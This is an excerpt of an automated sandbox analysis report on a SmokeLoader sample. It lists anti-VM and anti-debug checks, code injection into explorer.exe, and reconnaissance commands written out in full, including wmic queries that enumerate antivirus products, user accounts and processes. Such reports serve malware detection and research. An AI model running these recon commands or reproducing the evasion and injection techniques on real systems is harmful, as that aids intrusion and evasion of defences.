      Source: C:\Windows\explorer.exe TID: 5472Thread sleep count: 459 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3852Thread sleep count: 738 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3852Thread sleep time: -73800s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4900Thread sleep count: 513 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4900Thread sleep time: -51300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1460Thread sleep count: 412 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3448Thread sleep count: 246 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2000Thread sleep count: 376 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2232Thread sleep count: 192 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5740Thread sleep count: 186 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1148Thread sleep count: 225 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5004Thread sleep count: 103 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2336Thread sleep count: 139 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5228Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exe TID: 2112Thread sleep count: 2630 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exe TID: 2112Thread sleep time: -2630000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3904Thread sleep count: 2197 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3904Thread sleep time: -2197000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212Thread sleep count: 3699 > 30
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212Thread sleep time: -3699000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2448Thread sleep count: 3620 > 30
      Source: C:\Windows\explorer.exe TID: 2448Thread sleep time: -3620000s >= -30000s
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327AFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,10_2_00007FF7327AFB38
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,12_2_030F2B15
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,12_2_030F3ED9
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,12_2_030F1D4A
      Source: C:\Windows\explorer.exeCode function: 13_2_003C30A8 FindFirstFileW,FindNextFileW,FindClose,13_2_003C30A8
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F6512 GetSystemInfo,12_2_030F6512
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
      Source: explorer.exe, 00000001.00000000.1780445265.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 1403081037311360071403081037\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: b41LKM44PbG2dx6\r\nSystem Model: ak DvpvW\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ZF23E AWXUF, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'849 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'114 MB\r\nVirtual Memory: In Use: 1'077 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: SKpKn\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1403081037311360071403081037\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1780445265.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1780445265.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1780445265.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: ROUTE.EXE, 00000023.00000002.3178249452.0000017983999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401E65 rdtsc 7_2_00401E65
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,14_2_00581B17
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00581016
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,10_2_00007FF7327A78EC
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_0052092B mov eax, dword ptr fs:[00000030h]0_2_0052092B
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00520D90 mov eax, dword ptr fs:[00000030h]0_2_00520D90
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_005BF171 push dword ptr fs:[00000030h]0_2_005BF171
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004A092B mov eax, dword ptr fs:[00000030h]5_2_004A092B
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004A0D90 mov eax, dword ptr fs:[00000030h]5_2_004A0D90
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_0051E469 push dword ptr fs:[00000030h]5_2_0051E469
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_0052092B mov eax, dword ptr fs:[00000030h]6_2_0052092B
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00520D90 mov eax, dword ptr fs:[00000030h]6_2_00520D90
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00751339 push dword ptr fs:[00000030h]6_2_00751339
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F092B mov eax, dword ptr fs:[00000030h]7_2_005F092B
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F0D90 mov eax, dword ptr fs:[00000030h]7_2_005F0D90
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_0076E8DA push dword ptr fs:[00000030h]7_2_0076E8DA
      Source: C:\Users\user\AppData\Roaming\jfrhsweCode function: 8_2_0070092B mov eax, dword ptr fs:[00000030h]8_2_0070092B
      Source: C:\Users\user\AppData\Roaming\jfrhsweCode function: 8_2_00700D90 mov eax, dword ptr fs:[00000030h]8_2_00700D90
      Source: C:\Users\user\AppData\Roaming\jfrhsweCode function: 8_2_0074E702 push dword ptr fs:[00000030h]8_2_0074E702
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A2654 GetProcessHeap,RtlReAllocateHeap,10_2_00007FF7327A2654

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: jfrhswe.1.drJump to dropped file
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\bCnarg2O62.exeThread created: C:\Windows\explorer.exe EIP: 31719A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweThread created: unknown EIP: 13519A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweThread created: unknown EIP: 34119A8Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeThread created: unknown EIP: 9CA1970Jump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweThread created: unknown EIP: 8741970Jump to behavior
      Injects code into the Windows Explorer (explorer.exe)
      Source: C:\Windows\explorer.exeMemory written: PID: 2140 base: 9779C0 value: 90Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: PID: 5652 base: 7FF72B812D10 value: 90Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: PID: 5368 base: 9779C0 value: 90Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: PID: 5292 base: 7FF72B812D10 value: 90Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: PID: 2164 base: 9779C0 value: 90Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: PID: 4128 base: 7FF72B812D10 value: 90Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0Jump to behavior
      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9779C0Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_02F210A5
      Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_02F21016
      Source: C:\Users\user\AppData\Local\Temp\9245.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
      Source: explorer.exe, 00000001.00000000.1777211765.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1775938824.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_031455EB cpuid 12_2_031455EB
      Source: C:\Users\user\AppData\Local\Temp\9245.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A9224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,10_2_00007FF7327A9224
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,12_2_030F2198
      Source: C:\Users\user\AppData\Local\Temp\9245.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies the windows firewall
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
